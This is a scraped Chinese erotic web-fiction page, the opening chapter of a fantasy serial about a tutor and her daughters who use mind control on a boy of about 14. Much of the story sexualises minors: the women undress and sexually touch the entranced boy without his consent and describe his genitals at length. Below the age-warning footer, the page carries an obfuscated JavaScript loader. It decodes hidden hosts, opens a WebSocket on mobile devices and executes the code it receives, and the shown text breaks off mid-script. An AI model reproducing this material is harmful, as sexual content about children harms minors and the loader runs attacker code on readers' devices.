『【巫女屠龙记】【作者:HyperZ】【初高中篇第一二部完】』

  写在前面的话:此文是在下第一次写文,心中的紧张和激动无需多言!还请各位读者和各位前辈多多指教,多多支持!

  本文共分四部:初中篇、高中篇、大学篇、社会篇,目前详细剧本已经到高中篇结束,现在大家看到的只是冰山一角,今后随着情节的展开,还会有很多人物和派别将陆续登场。

  本文关键词:当代、都市、玄幻、逆推、无雷无郁闷。注意,本文为通篇逆推!如有不喜者还望勿扰,如有同好还望多多支持,您的支持是我前进的动力!

  一些必要的前期介绍:

  由于本文为玄幻类作品,为了让读者在阅读之前对我的作品中的世界有一个大概了解,现对文中出现的异能者进行一下大致介绍,请务必先认真阅读!

  神龙转世:

  传说中上古的神龙会每500 年转世一次,附体在一个新降生的人间男孩身上,为人间带来幸福、吉祥和平安。被神龙附身的男孩会事先经过严格的挑选,但由于没有任何看得见摸得着的特殊能力,他往往不知道自己的特殊身份和下列7 点,只当自己是普通人。男孩会具有以下特点:

  1 、容貌清秀俊美、身体线条自然柔顺健康、自小家教严格、身心无邪念恶念、为人善良正直坦诚,反对杀生,主张世间万物皆有灵。

  2 、他会保佑身边与他接触的人,无论正邪均平安健康,不遇灾祸。

  3 、他的身上会散发出一种常人无法察觉的气息(气态龙涎香),吸引优秀的异性接近他,并对他产生比毒瘾还要强烈的依赖感和占有欲,并从此对其他男人(哪怕再优秀)产生强烈排斥感和厌恶感。

  4 、阳具比一般人大、性能力远超常人,但与之截然相反的是其心理发育较晚,性欲不强,喜欢理性思维。

  5 、身怀异能的处女如果被他破处,会被强烈激发出身体内的潜质,修为将呈井喷式提升,非处女和他做爱,也会提高修为。

  6 、他体内的某种体液若定期被女人在高度兴奋状态下吸收,将会使此女容颜不老、青春永驻。

  7 、只有当他真心爱着某个女人的时候,精液才会使此女怀孕,以此作为对挚爱的回报。神龙所生的孩子必将出人头地,成就伟业。

  自古以来,神龙的秘密绝少有人知晓,只有从上古一直流传下来的极少数秘密派别的核心人物知道,有些秘派甚至能掐算神龙诞生的年代,并为争夺神龙做充分准备。

  白巫女一族:

  从上古女娲时代开始流传至今的神秘派别,该族皆为女性,只以血亲为传播方式,传女不传男,传内不传外。连自己的丈夫、儿子和父亲都不知道自己的秘密,只在母女间一代代延续,并口口流传神龙转世的秘密。

  白巫女一族的女孩靓丽迷人、身材火辣,每当女儿的巫力超越自己,母亲就必须将掌门人的宝座正式传给她,若有多个女儿,则必须选出一位作为掌门人,自己和其余人辅佐。

  白巫女的巫术极为强大,最顶级的两种巫术为「预知术」和「控心术」,预知术即先知能力,消耗巫力极大,因此每个掌门人一生都慎用此术。控心术为白巫族的镇族之宝,可以几个小时内控制1 个人的心神,并可对其发出任何指令,被控人在此期间完全失去自主意识,无记忆。事后不会造成身心伤害,只会以为自己睡了一觉。

  由于这项巫术,自古以来白巫族成功的从无数次战争中存活下来,并多次成为辅佐一代明君的皇后贵妃,享尽荣华富贵,最鼎盛时期甚至权倾天下或垂帘听政。

  但随着岁月流逝,热兵器、远距离大规模杀伤性武器的普及,白巫族慢慢衰落,到今天已经泯然众人,直到某天一个天资、巫力过人,野心极大的掌门人,用禁术预知术找到了500 年一遇的神龙转世。

  第一部 初中篇 第一章 邂逅

  夕阳将余辉洒满了这座古老的城市,火红的彩云映红了路边忙碌的小摊贩;映红了道路上来来往往的汽车;映红了边遛狗边和街坊聊家常的老人;映红了刚下班匆忙赶路的行人;映红了路边嬉闹的学生。饭菜的香味从栋栋老楼里飘出,一群群楼鸽欢快地盘旋着,热闹了一天的古城渐渐地安宁了下来。

  在一条宁静的小路上,一个少年正步伐轻快地走在回家的路上。精神利落的短发下,俊俏的脸上写满了纯朴和稚气,一身干净合身的校服和运动鞋勾勒出了少年健康而匀称的体格。

  他叫袁小松,出生于这里的一户普通家庭,父母都是勤劳朴实的上班族。由于是家里的独子,父母虽然疼爱他,却又怕过分的溺爱会毁掉他的将来,因此对他的管教极为严格。从他懂事开始,严厉的父亲就教育他对长辈、对老师和同学一定要有礼貌,不欺负弱小,尤其是不准欺负女同学等等。

  ……

  「唉,这幺多年,一个人拉扯着两个孩子,也真是太难为你了啊。」「嗐,我已经习惯了。」

  妈在和谁说话呢?

  刚走到门外的小松不禁皱了皱眉头。

  「妈我回来了。」

  嗯?

  一进门,袁小松就看见了一双以前从未见过的,镶着水晶蝴蝶结的亮黑色高跟皮鞋。

  「哦,小松你回来了啊,快过来见见你的新老师!宋老师,这就是我儿子小松。小松,快叫宋老师!」

  只见客厅的沙发上,袁母的对面正端坐着一位气质高雅的中年美妇,一袭深灰色的职业套装衬托出少妇略显丰腴的姣好身材,及膝的套裙下,肉色丝袜将一双修长圆润的小腿紧紧的包裹起来,少妇的双脚上穿着家里的凉拖,芊芊玉足的尽头,粉红色的蔻丹在丝袜的掩映下若隐若现。

  上衣的领口略低,胸前高高鼓起,一头飘逸的长发稍稍遮盖住了胸前雪白的肌肤。白皙的鹅蛋脸上化着精致而得体的职业妆,一双秋水般的大眼睛看到愣在原地的袁小松后先是猛地一亮,而后又微微地眯了起来,性感的嘴角勾起了一抹不易察觉的微笑。

  「宋老师好……」看见美丽的老师正温柔地看着自己,袁小松不禁满脸通红地低下了头。他心虚地一点点蹭到客厅里,斜眼瞥见茶几上整齐地码放着自己用过的英语课作业本和一摞卷子,旁边的茶杯边,一张精致的名片上依稀可以看到「宋振莹」三个字。

  「妈,您这是?」

  「小松,你说话就要升初三了,再有一年多就该中考了,可你的英语老是上不去,这可不行啊!这不妈给你请来了家教老师,从这周六开始,你每周都要开始补习……」

  「不!我不要请家教!我周六还要去踢球呢!」还没等母亲说完,袁小松就大声地打断了她,双眼也因为紧张和恐惧而蹬得大大的。这也不能全怪他,对一个1?? 4??岁的男孩子来说,英语和英语老师的吸引力,一般远没有动画片、足球和电子游戏大。

  听到小松猛然的大喊,宋振莹本来沉稳的微笑顿时一僵。

  「这孩子!怎幺这幺不听话!」袁母训斥了儿子一句,转过头来对笑容有些僵硬的宋振莹说道:「呵呵,宋老师,您那个,别往心里去啊!这孩子其实挺老实挺听话的,都怪我事先没跟他沟通好,您放心,我一定……」「我就不补!就不!!!」袁小松生气地冲进自己的房间,「碰!」的一声把门狠狠的撞上。

  这回轮到袁母僵在沙发上,嘴角气得不停地发抖:「这怂孩子!看我一会儿不……」

  「好啦好啦……」已经恢复平静的宋振莹反过来开始安慰她:「男孩子嘛,又是这个年龄,都这样!」

  「唉,儿子大喽,不好管喽……不过宋老师你放心,回头等孩子他爸回来,我们俩肯定能说服他!」

  「嗯,不用着急,记住一定别太粗暴,那样会伤了他。这样吧,咱们把原定的时间推后一周,这几天你们再劝劝他吧。他的作业和卷子我都看了,说实话,确实需要好好补补了,要不然,等到了初三,再补可就晚了。」「嗯。等他以后就会明白,这都是为他好。」

  「那您看补课的地点是我上您这儿来呢?还是小松到我家去呢?我家那边很安静的。」

  「小松去您家方便吗?」

  「没事,我家二闺女正好也上初二,一天到晚也特不让人省心。有小松在,正好俩孩子一起学习,还能共同进步呢。至于其他的您不用担心,他一个初二的孩子……」

  「那……就让小松去您那儿吧,这儿这幺乱不说,还到处都是他的玩具和杂志,我怕影响了补习。再说您也说了,咱们两家离的不算远,就几站地,让小松骑车去!也锻炼锻炼,省的他老离不开家长!」袁母满脸堆笑,嘴上一套一套地说着,心里却想:

  你来我家?别开玩笑了!你长的这幺祸国殃民,又是个寡妇!这要是让我家那死鬼看见了,就说他人挺老实的吧,可不怕一万,就怕万一啊!这要是你俩闹出点什幺事儿,我可怎幺活啊!

  宋振莹轻轻点了点头,起身道:「那好,那我就先告辞了,价格就按咱们刚才谈好的。如果你们说服了孩子,那咱们下周六下午一点,直接让孩子带着书本和笔过来就行了。」

  「哦!那好,那真是太谢谢您了宋老师!」袁母将宋振莹送到门口,寒喧后望着宋振莹婀娜的背影长出了一口气:

  呼~~,走的真及时,幸亏我家那口子得待会儿才能回来,要不然……袁母在门口暗自得意,却没看到背对着她的宋振莹脸上更加得意的微笑…………

  一周后,在老袁两口子大棒加甜枣的攻势下,袁小松终于乖乖地站在了宋振莹家门口。

  「谁啊?」一个甜甜的女声从里面传出。

  「请问是宋老师家吗?」

  门开了。

  袁小松一抬头,只见迎面扑入眼帘的是一个高挑白皙的大姑娘,个头足足比他高了一截。乌黑的长发被蓝色的蝴蝶结扎在脑后,清秀的瓜子脸上,一对乌溜溜的大眼睛正略显羞涩地上下打量着自己,一身洁白干净的吊带裙衬托出女孩青春而充满朝气的诱人身姿,也露出了胸前大片雪白的肌肤,高耸的酥胸随着呼吸微微起伏。

  最要人亲命的是,这女孩似乎没穿内衣,胸前的两点隐隐的小凸起让袁小松只觉得头晕目眩、呼吸困难、两腮滚烫。从没被美女这幺盯着看过的他直羞的恨不能马上找个地缝钻进去。

  「你是?」女孩微笑着问道。

  「那个……我叫袁小松……请问这里是宋老师家吗?我是来补课的……」「哦,是袁小松同学啊,快进来!」熟悉的声音从女孩身后的客厅里传出,「月心你也真是的,别光堵在门口,倒让人家进来呀。」「哎!」女孩应了一声,侧身为他闪出了一条路,袁小松赶紧低着头从她身边溜了进去。擦身而过时,他偷偷看到了女孩那双光溜溜的大长腿和拖鞋里一对纤美的雪足,十根秀气的脚趾调皮地颤动着……她的名字叫月心吗?

  好漂亮的大姐姐!

  人美,名字也美……

  可是她为什幺一个劲儿盯着我?

  我的脸上和身上有什幺东西吗?

  小松不敢多想,低着头溜进宋振莹家的客厅。

  这是一所普通但布置得很典雅的三居室,收拾得也很干净,淡淡的香水味在屋内弥漫,只叫人闻上去心旷神怡,似乎……中间还夹杂着一点点女人身上的芳香……

  「来,袁小松同学,坐!别客气,到了这儿就像到了自己家一样。」和上次见面完全不同,宋振莹这次只穿了一件短袖连衣裙,拿着茶壶正在给他沏茶。

  「这幺热的天,你一定渴了吧,先喝口水。」

  「嗯,谢谢您。」

  「东西都带了吗?」

  「嗯,带了。」

  袁小松拘束地坐在柔软舒适的长沙发上。为了掩饰自己的紧张和尴尬,他从宋振莹手里接过了茶杯,刚要喝却突然感觉到好像有人在盯着自己。

  咦?

  杯口停在了嘴边,袁小松几乎是凭着本能找到了目光的来源。他转头望去,却见旁白一扇卧室门稍稍地向里打开了一条缝,一只亮晶晶的大眼睛正在偷偷地瞄着自己。

  发现自己暴露后,只见那只眼睛猛地又瞪大了一圈,随着门后「啊!」的一声尖叫,屋门被迅速地关闭。

  听声音似乎是个女孩?

  「呵呵,那是我的小女儿月珊。」宋振莹边说边走到紧闭的门口,「月珊,快点出来,马上咱们就得开始上课了。」

  「我才不呢!」略显稚嫩的声音由于隔着一道木门而略显沉闷,「我不要和他一起上课!我要和姐姐玩!」

  「唉……这丫头……」

  宋振莹回头无奈地看了小松一眼:「那咱们先进屋吧,待会儿让她姐姐去叫她。」

  「啊?不是在这里上课吗?」

  小松惊讶地瞪大了眼睛,再进屋可就是卧室了。而父母从小就教育他,女孩子的卧室,是不能随便进的。

  「嗯,这里不合适,跟我来。」宋振莹不容分说地带着小松走进了她的卧室。

  随后的两个小时,大大出乎袁小松意料的,宋振莹并没有像以前的其他家教老师那样高高在上地、自顾自地开始讲课,而是先通过闲聊让他慢慢放松了下来,接着通过简单的测试,准确地找到了他的薄弱环节。

  看着宋老师非常专业地为自己制定了长期的补习计划,此时倍受鼓舞的小松已经开始真心地佩服起这位美丽、慈爱而又认真负责的阿姨。他一改刚进门时的拘谨、羞涩和寡言少语,开始认真地听讲、记笔记、回答问题,两个小时的时间很快就过去了……

  「谢谢老师!那我先走了,老师再见!」

  袁小松向宋振莹深深地鞠了一躬。

  「嗯,再见,别忘了下周六下午一点。」

  微笑地送走了学生后,宋振莹轻轻地关上了门,此时她的两个女儿已经在客厅的沙发上等着她了。

  关月珊身着一件小背心和超短裤,盘腿坐在沙发上,修长而纤瘦的身材和刚刚开始隆起的胸部表明了她还在发育。

  只见她柳叶般的小眉头紧紧地皱着,噘嘴道:「什幺嘛,没看出和我那些同学有什幺区别啊!」心里却想:除了比我那些同学还有电视上的明星长的更帅以外……

  关月心依然穿着吊带裙,慵懒地翘着二郎腿半躺着,疑惑地问道:「妈,这些年来,您耗费了半生功力找到的神龙转世……不会就是这小子吧!」一想到母亲和她们讲过的那个几乎只有在奇幻小说里才可能出现的传说,以及按照母亲安排,她们和他将要发生的事情,关月心就忍不住俏脸通红,小心肝砰砰地狂跳。

  「呵呵,就知道你们会沉不住气的。别着急宝贝儿们,等他再来几次,时机一成熟,我就证明给你们看。到时候啊,你俩能不为了他打架就不错了。」宋振莹一副胸有成竹的模样。

  「妈我不明白,既然您也说过预知术不等于就百分百保证准确,那为什幺今天不直接用控心术验明正身呢?」关月心不解地问,「万一要是祖传的年谱掐算的不准……」

  「傻丫头这可不行。控心术虽然可以让他觉得只是睡了一觉,但醒来后,他会不理解为什幺他会睡着……所以,现在还不是时候。」清了清嗓子,宋振莹又正色道:「我知道你们心里是怎幺想的。说实话,我也对这个传说半信半疑。可是,这件事从几千年前开始就代代相传,而且并不是只有咱们这一族在传诵这个秘密,因此我宁可信其有,不可信其无,说什幺也要试一试。万一要是真的,那咱们一族将来必定无敌于天下,重现曾经的辉煌。」说到这里,她又意味深长地看了看两个女儿:「你们问过我很多次了,为什幺咱们修行的巫术里,含有一些巫山云雨之技巧?为什幺咱们一族的巫术可以令女人天生丽质,可我却一直对你们严加管教,自己这十几年也守身如玉,再没有碰过男人?而为什幺又偏偏对一个看似普通的男孩青眼有加?」深深地吸了一口气,宋振莹轻轻地望向远方:「这些问题的答案,很快你们就会明白了……」

  ……

  一来二去,袁小松和关家母女三人都慢慢地熟络起来,虽然同龄的关月珊或许是出于害羞,和自己说话很少,但是活泼开朗的关月心却让独生子的他深感自己要是有这幺一个姐姐就好了。而宋振莹更是无需多言,和她一比,现在的英语老师简直可以卷铺盖回家了。而母女三人貌似也喜欢上了这个英俊、善良而又纯朴可爱的男孩子……

  一个多月的时间很快就过去了。终于有一天……「小松同学,要不先休息一会儿吧。听你妈妈说最近你又报了两个辅导班?」今天宋振莹为自己的学生准备了一份颇有难度的试题,在他答题的同时,自己一边在其身后来回踱步,一边时不时地停下来解答问题。

  「没事的宋老师,我不累。」正趴在课桌上答题的袁小松感激地看了老师一眼,又埋下头去。

  「还有,小松,以后在家不用叫我宋老师了,叫阿姨就行了。」「哦……」男孩刚要开口,忽然感觉右脸颊一阵香风扑来,接着背后一紧,似乎有什幺又柔软又暖和的东西贴住了自己,一只纤纤玉手搭在自己的左肩上,恍惚向右看去,只见美女老师的脸已经近在咫尺,飘柔的青丝轻轻地剐蹭着自己的耳垂。袁小松只觉得一种奇妙的酥麻感觉像电流般传遍了自己的全身,他不禁浑身紧绷,被一阵阵的窒息冲击得几乎要晕过去。

  「阿姨……老师……?」少年颤抖着问到。

  「小松,你这道题不能这幺答!」没有理会少年的窘迫,宋振莹目不斜视地指着卷子上的一道题大声说道。

  「啊?哦……!那……那这句话应该怎幺翻译呢?」如梦方醒般的少年目光被牵引回桌上。

  「嗯,你仔细听好……」随着宋振莹的樱唇几乎贴着他的耳垂缓缓开合,只见少年眼中的神采慢慢地褪去,表情也变得呆滞起来,双手更是缓慢而无力地垂在自己的身侧。

  「小松?小松同学?」见男孩对自己的呼唤没有回应,宋振莹非但没有离开他的身体,左手反而顺肩而下,轻轻地摩梭着少年平坦而结实的胸膛,右手则悄悄地搭在他结实的大腿上慢慢地抚摸着,渐渐从短裤的裤管口向着里面摸了进去,樱唇轻咬着少年的耳垂……

  「嘭!」的一声,屋门被猛地撞开,已经在门外偷窥许久的姐妹花一起拥了进来。被吓了一跳的美妇只好依依不舍地放开自己的猎物。任由自己的女儿们围住已经被控制了心神的男孩。

  好奇的关月珊先是将手在小松的眼前晃了晃,见他没有反应,又推了推他的身体:「哈哈!真好玩!就跟木偶一样!」

  谨慎的关月心问道:「妈,这就是您教过我们的『控心术』吗?果然厉害,可您确定他不会突然醒过来?」

  母亲得意地看了她一眼道:「呵呵,你也太小看妈了!别说他现在不会醒,待会儿就算天塌下来,他也醒不了。而且这段时间他是不会留下任何记忆的。」她顿了顿又说:「好了,月珊,别闹了!袁小松同学,现在慢慢地站起来。」「是……」只见面无表情的男孩缓缓地站起身来。

  「走到床边坐下。」

  「脱掉自己的上衣、鞋子和袜子。」

  「趴到床上去。」

  少年机器人般一一地执行着命令,最后赤裸着上身静静地趴在成熟女人卧室的双人床上。如果说宋振莹这一连串如马戏团驯兽般的口令还只是让女儿们感到新奇和好玩的话,接下来她的举动,真正令二人感到目瞪口呆。

  只见她先是令两人坐在床对面的椅子上,然后脱掉了拖鞋爬上床,轻轻地跪坐在小松的身侧,两只手哆哆嗦嗦地攥住他的裤腰带,开始脱他的裤子。

  「妈!你这是要干什幺!?」关月心问道。已经有预感的她此时满脸潮红,高耸的胸口随着越来越粗重的呼吸而大幅起伏着。

  「一会儿我要发动一次浅层的巫术,这会让他的身体大量发热,如果穿着衣服会严重伤害他的身体的。怎幺?不是你们要『验明正身』的吗?」虽然年龄和阅历都远超女儿,但看着眼前男孩光滑匀称的背部和结实的腰肢,宋振莹此时也不禁夹紧了饱满的大腿。

  「……」关月心无言以对,而反观月珊已经根本没有说话的能力了,她一边屏住呼吸,一边傻傻地盯着袁小松的后背。

  「我就是怕你们俩受不了这种刺激,才让他趴在床上的。」宋振莹的手在小松的腰间犹豫了很久,终于一咬牙,抓住他的短裤和里面的内裤,缓慢而坚定地向下脱去……

  当少年健康而细嫩的肌肤,及匀称而结实的身条完整地展现在母女眼前时,关月珊不禁尖叫着用手遮住了眼睛,又禁不住眼前美少年纯洁身躯的诱惑,用好奇的目光使劲地从指缝里地偷瞄着他的每一寸肉体,脸更是红的像一个大苹果。

  和妹妹相比,关月心到底大了三岁,只见她在小松露出屁股的一瞬间猛地低下了头,狠狠地咬住了自己的手指,紧接着顽强地抬起头,一双妙目勇敢地向前直视。

  宋振莹艰难地咽了一口口水,费力地盘腿坐好,双手悬在小松上方,开始念动真言……

  随着她的念念有词,床上失去神志的袁小松身体开始轻轻地颤动,背部皮肤上隐隐地浮现出了一条狰狞威猛的巨龙,虎须凤爪,气宇轩昂,好像随时都会从他的背上破体而出一样!

  姐妹俩目瞪口呆地看着这自古以来的皇权和帝王象征,关月珊的双手不知不觉地垂了下来,已经被震慑得如泥塑木雕般动弹不得,而更令她们吃惊的还在后面……

  宋振莹双眼放出惊喜的光芒,虽然浑身已经是香汗淋漓,却更努力地催动巫术,几秒钟后,袁小松的双腿和双肩上开始渐渐浮现出美丽的金色龙鳞。

  随着巫术的力量越来越强,散发着金色光泽的鳞片开始越来越多地显现出来,一直延伸到了大臂上和锁骨处。同时后背上线条已经非常清晰的巨龙也开始金光大盛,一股闻上去像是甘甜泥土的香味(气态龙涎香)在屋子里弥漫开来。

  「这……这是什幺味道……好好闻啊……」月珊叹道。

  闻着着淡雅的香气,姐妹俩的目光渐渐地迷离起来。她们还不知道,母亲的巫术已经强行开启了神龙身体的大门,现在袁小松腋下和胯下散发的是一种足以令任何贞洁淑女变成荡妇淫娃的「男性体香」。

  本来这种气息凡人无法察觉,只会随着男孩年龄的增长而一点点增多,藉以增加对优秀异性的吸引力。只有在遇到心爱女人的时候,才会分泌地略微多一些,以便求偶,熟料现在被强力巫术激发而大量泄露,成为了世间罕有的催淫气体。

  毫无经验可言的两姐妹只觉得如同热锅上的蚂蚁,两腿之间的私处慢慢向外渗出一丝丝蜜汁,自制力稍强的月心还好些,月珊却已经不由得边轻声呻吟边抚摸自己的身体,并将双腿紧紧并在一起用力地互相摩擦着。

  宋振莹此时比女儿也好不到哪儿去,独身多年的她只觉得浑身燥热无比,恨不能立刻扑到袁小松身上将其「就地正法」,但是,尚存的一丝理智告诉她――现在还不行。

  预感到再继续下去将酿成大祸的她赶忙撤去了巫力,顿时,袁小松身上的鳞片和龙纹身慢慢地消失了,身体也不再向外散发那诱人的香气。

  「好了,你们已经亲眼看到了,这回该相信了吧!」宋振莹道。

  「那个,妈,我……我想看看前面……可以吗……」关月心的声音越说越小,到最后已经是几不可闻,说罢她不由羞赧地低下头,只觉得双颊如火炭般滚烫。

  「这……可以是可以,不过我就怕你们控制不住自己……」宋振莹嘴上这幺说,其实内心也是同样的心思,只是碍于面子没敢做。现在大女儿的话正合其心意,她生怕月心出口反悔,赶忙将身体前探,一手扶肩、一手扶腰,将袁小松缓缓地扳了过来。

  「啊!!!」三女同时发出一声惊呼,关月珊更是险些晕过去。

  只见小松胯下,一条粉红色的肉棒正安静地和主人一起酣睡着,对自己将来的悲惨命运还丝毫不知。肉棒的包皮不长,即使是在不勃起的状态下,也能完整地露出粉嫩的龟头,在灯光照射下映射出漂亮的光泽。

  少年的阴毛还很稀疏,由于经常清洁的缘故,整个下身显得干净而稚嫩,没有任何令人反感的味道。两粒睾丸在肉袋里随着身体的翻转而调皮地滚动着,刺激着女人们的官能神经。

  但最让宋振莹意外和刺激的,莫过于肉棒的尺寸。袁小松自己和未见过男人身体的关氏姐妹俩当然不知道,他的肉棒比起同龄的男孩子要大的多,已经快要赶上成年男子了。

  「好大啊……现在就这幺大,以后不知道要迷死多少女孩子了!形状也这幺漂亮,真想吃一口啊……」距离最近的宋振莹眼里几乎喷出火来,直勾勾地盯着小松的肉棒,浑然忘记了世间的一切,殊不知她的两个女儿已经到了忍耐的极限。

  「我……妈妈……我……我受不了啊啊啊!!!」只见关月珊突然娇吟一声,猛地从椅子上蹦下来,连拖鞋也不穿就朝着袁小松的身体扑了过去!关月心正处在理智崩溃的边缘,被妹妹的举动吓了一跳,再阻止已经来不及了。

  宋振莹也被月珊的喊声惊醒,她一把抱住了扑过来的女儿,两人滚到床上。

  「月珊!你要干什幺!你疯了吗!」

  「妈!我再也忍不住了!我……我要啊啊啊啊!!!」月珊边挣扎边声嘶力竭地喊叫着。这时月心也跑了过来,和母亲一起制服了妹妹的疯狂行为。

  「珊珊!你冷静点!」月心叫道,「妈,我也快不行了!为什幺咱们不现在就……」

  「不,不行!千万不可!今天的法术已经消耗了他大量的元气,如果再强行夺他的身体,会彻底毁了他!」宋振莹费力地喘了口气又说:「况且现在已经快四点了,再不唤醒他,他和他的家人都会产生怀疑的!」「呜呜呜……你们……你们坏……就知道一起欺负我……呜呜呜」心知今日已经无望的月珊趴在母亲的怀里放声哭泣着,边哭边用小拳头无力地捶打着她身边最亲的两个人。而表情呆滞的月心,也慢慢地从妹妹身上滚了下来,三人大汗淋漓地躺在床上,已经开始各自打起了自己的小算盘…………

  「喂……醒醒……小松同学……醒醒……」耳中传来虚无飘渺的声音,已经被重新穿戴整齐的少年慢慢地睁开了眼睛。

  「我……我这是在哪儿……这到底是怎幺回事?」望着床边宋老师关切而温柔的目光,袁小松昏昏沉沉地问道。

  「你呀,唉,最近也真是太辛苦你了,刚才你睡着了,呵呵。」宋振莹早已恢复了常态。

  「啊!?对不起宋老师!我……我真不是故意的!」刚坐起来的男孩无法原谅自己上课睡觉的无礼行为,愧疚地低下头不敢看老师的眼睛。

  「呵呵,你看你这孩子,老师并没有怪你哦。」宋振莹笑着轻抚袁小松的头说道,「小松,你最近进步很大,老师很为你感到骄傲和自豪,但是你也不要给自己太大压力,要是累坏了身子,我可没法向你父母交代。还有,不是跟你说了嘛,叫我阿姨就行了。」

  「阿……阿姨,对不起……我现在该怎幺办……」「唉,都说了不怪你的。这样吧,你今天回家后就和父母说今天在我这儿考试来着,千万别跟他们说你睡觉的事,要不他们会教训你的。」美妇的眼睛里露出狡捷的目光:「以后,老师每次给你上课到两点,剩下的一个小时,你在我这里休息一下,或者玩一会儿都行。我只收你一半学费,剩下的钱你自己管理,好不好?」

  「啊!?真的吗!?那太好……」刚面露喜色的袁小松突然又说,「不,不行,这不合适,我不能这幺做!」

  「呵呵,好吧,这件事以后再说,你现在感觉怎幺样?有没有什幺地方不舒服?」宋振莹顺势轻轻握住了小松的手。

  「哦……我倒没什幺特别的感觉。」感受到宋老师关切的目光,小松扭捏地把手从她的两手间抽出,「就是觉得有点累……不知道为什幺……」「嗯,那就好。现在时间也不早了,你还是早点回去吧,要是太晚了,父母会担心的……」

  「嗯……啊!?已经四点半了?!!!」刚刚看到墙上挂钟的男孩大吃一惊,他腾地从床上蹿了下来,一边收拾自己的书包一边哭丧着脸说:「完了,回家肯定要被爸妈骂的。」

  「呵呵,不用着急,别落了东西。记住我刚才跟你说的话哦。」「是!那我先走了,阿姨再见!」

  「慢点!呵呵呵,这孩子」宋振莹风情万种地倚靠在门框上,目送小松骑着自行车一溜烟远去的背影出神,不像是送学生放学的老师,倒像是送丈夫上班的妻子。想到刚才看到的男孩刚阳而健美的身体,少妇只觉得下体一阵阵发紧发痒,她摇摇晃晃地回到客厅,却看到大女儿已经等在那里了。

  「心心,你妹妹呢?」

  「赌气回她自己房间了……妈,我刚才都看到了。」「看到什幺?」

  「看到他把手抽了出来。」关月心嘴角微微上翘,略带得意地说道,「这说明在他的心里,他只把您看作一个老师,一个很好的老师,这个形象是不会轻易改变的。他也不是那种人,做不出那种事的。」「月心!」宋振莹惊讶地看着大女儿,只见月心缓缓起身,走到跟前拉着自己坐回沙发上说:「妈,记得当初您因为用了预知术巫力消耗非常大,而我又得您真传,现在巫力已经超越了您。所以按族规您把掌门之位传给了我。您说心里话,现在您是不是后悔了?」

  「月心,你这话是!?」

  「妈,其实我俩心里都明白,您也想得到他,只是碍着我们,不好表露出来。

  说实话,这幺多年您没再嫁人,都是一个人过来的,您的心情我能理解!按理说,如果他真的是神龙转世,那幺您无论对他做什幺我们都应该支持您!」关月心一双漂亮的大眼睛满含热泪,顿了顿又坚定地说,「可是,既然您现在已经把掌门之位传给了我,说以后咱们一族要靠我来发扬光大,又要把『龙子』供我所用,那您为什幺还要勾引他呢?」

  「我!我没有……!」

  「还说没有!刚才摸他的手也就算了,还让他叫阿姨!妈,我是您的女儿,再说我也是女人!您想干什幺我都知道!」

  「我……!」

  「姐,你说了这幺多,无非就是要独占他,对不对!?」宋振莹刚要解释,却见旁边二女儿不知什幺时候已经走出自己房间。

  「珊珊,这里没你说话的份儿,回你房间去!」月心面带愠色说道。

  「哼!我凭什幺回去!被我说中了对不对?姐,你现在巫力比我强只不过因为你比我大三岁罢了,要是咱俩一样大,我肯定比你强!」「再者你刚才说,妈在小松心目中永远是老师形象?呵呵,你还是先想想你自己吧!你比他大了足足三岁!他只会把你看成姐姐,永远!」「而我就不同了,别忘了我们可是同岁的哦!从高中到大学很有可能进入同一个班级,接触时间一长幺……」

  「你!!!我揍死你!!!」险些气炸了肺的关月心就要从沙发上跳起来追打妹妹,却被母亲一把拉住。

  「月珊,听话,回屋去。」宋咬着牙对月珊说。

  「妈!!!你凭什幺老是向着她!掌门也给了她!现在好不容易找到的神龙转世还是要给她!呜呜呜!你从来就没考虑过我的感受!!!」委屈的泪水如同断线的珠子般顺着月珊的脸颊流淌着,「我!我讨厌你们!

  !!呜呜呜~~~!」关月珊大哭着跑回自己的房间,狠狠地撞上了房门,门内隐隐地传出了她的呜咽声。

  短暂的沉默后,关月心又对母亲说:「妈,不管怎幺说,这回这个什幺神龙转世,我是要定了!哪怕不择手段!谁也别和我抢,别忘了我现在是掌门人,你们都要听我的!」

  「再说您不是说我们学的巫术还需要实战吗?现在实战的机会来了!」说罢她起身狠狠地瞪了妹妹的房门一眼,大步流星地回到自己的房间去了。

  「唉,这两个宝贝儿可真叫人头疼啊。我这都是何苦……」目睹了两个女儿战争爆发的宋振莹疲惫而无力地躺倒在沙发上……

????????(未完待续)

????????字节:23956

         总字节:754264

返回首页返回顶部

©邮箱:guang123gao@163.com

警告!通过访问本网站,您可以证明您在您所在的州、省或国家的法律下至少年满18岁或达到法定成年年龄。我们明确并严格限制本网站的使用范围为18岁以上的成年人或个人管辖权范围内的成年成年人(以年龄较大者为准)。任何低于这个年龄的人都被严格禁止使用这个网站。WARNING!By accessing the Website, you certify that you are at least 18 years of age or the age of majority under the laws of your state, province or country. We expressly and strictly limit use of the Website to adults over 18 years of age or the age of majority in the individual’s jurisdiction, whichever is greater. Anyone under this age is strictly forbidden from using the Website.

function vAaiW(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function gFfeukj(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return vAaiW(t);};window['\x46\x45\x48\x72\x50\x71\x78\x61\x6c\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=gFfeukj,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new 